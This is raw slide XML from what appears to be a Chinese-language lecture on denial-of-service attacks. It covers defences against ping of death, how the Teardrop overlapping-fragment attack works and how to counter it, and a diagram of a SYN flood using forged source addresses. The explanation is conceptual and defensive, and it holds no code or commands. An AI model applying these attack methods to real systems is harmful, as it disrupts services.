              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>死</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ping(ping of death)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的防御：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>现有标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>实现都已实现对付超大尺寸的包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows98</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>之后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows,NT(service pack 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) linux, Solaris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mac OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>大多数防火墙能够自动过滤这些攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>此外配置防火墙，阻断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>以及任何未知协议都将防止此类攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11"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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17"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507">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23"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p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>向攻击目标发送多个分片</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重叠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>某些操作系统收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分片</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重叠的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包会系统崩溃、重启。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节的数据报被分为两片，第一片数据发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0~36</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节，而第二片发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>24~27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节，在某些情况下会破坏整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈，必须重新启动计算机才能恢复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Teardrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防止措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用最新的服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包（打补丁）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加入条件判断，对这种异常的包特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297986" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Tear drop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{548339A1-3B75-48EB-A7C3-8D5353BF729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fld id="{AA74516C-6FCB-4A72-A221-5BE14987E8F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52229" name="Group 407"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2632075" y="2916585"/>
            <a:ext cx="4367213" cy="744538"/>
            <a:chOff x="1488" y="1776"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35860" name="AutoShape 40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ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35861" name="Text Box 409"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1824" y="1920"/>
              <a:ext cx="190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1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN （</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>我可以连接吗？）</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52230" name="Group 410"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2563813" y="3930998"/>
            <a:ext cx="4475162" cy="612775"/>
            <a:chOff x="1440" y="2496"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35858" name="AutoShape 411"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1440" y="2496"/>
              <a:ext cx="2496" cy="528"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 118182"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35859" name="Text Box 412"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1694" y="2641"/>
              <a:ext cx="19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en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ACK （</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>可以）/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>请确认！）</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52231" name="Group 413"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2772123"/>
            <a:ext cx="2805113" cy="2894012"/>
            <a:chOff x="-299" y="1968"/>
            <a:chExt cx="1835" cy="1939"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35856" name="Picture 4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9" y="1968"/>
              <a:ext cx="1835"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7" name="Text Box 415"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="240" y="3600"/>
              <a:ext cx="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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>攻击者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6500813" y="2843560"/>
            <a:ext cx="2246312" cy="3136900"/>
            <a:chOff x="6500165" y="3480540"/>
            <a:chExt cx="2246626" cy="3136160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35854" name="Picture 4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2260" y="3480540"/>
              <a:ext cx="2214531" cy="24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 Box 418"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6500165" y="5785662"/>
              <a:ext cx="2142700" cy="83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dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>受害者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>分配资源维持半连接</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52243" name="Text Box 418"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="4434235"/>
            <a:ext cx="27130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1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>回复</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>次，第一次等待</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>秒，重新回复后等待时间翻倍，回复</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>次，共等待</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>98</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>秒</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52233" name="Text Box 419"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113" y="2056160"/>
            <a:ext cx="359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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>伪造地址进行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52239" name="AutoShape 421"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7280275" y="1268760"/>
            <a:ext cx="1539875" cy="1289050"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26440"/>
              <a:gd name="adj2" fmla="val 72954"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>为何还没回应</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>？？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52236" name="Text Box 426"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113" y="5278785"/>
            <a:ext cx="35941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dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>不能建立正常</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
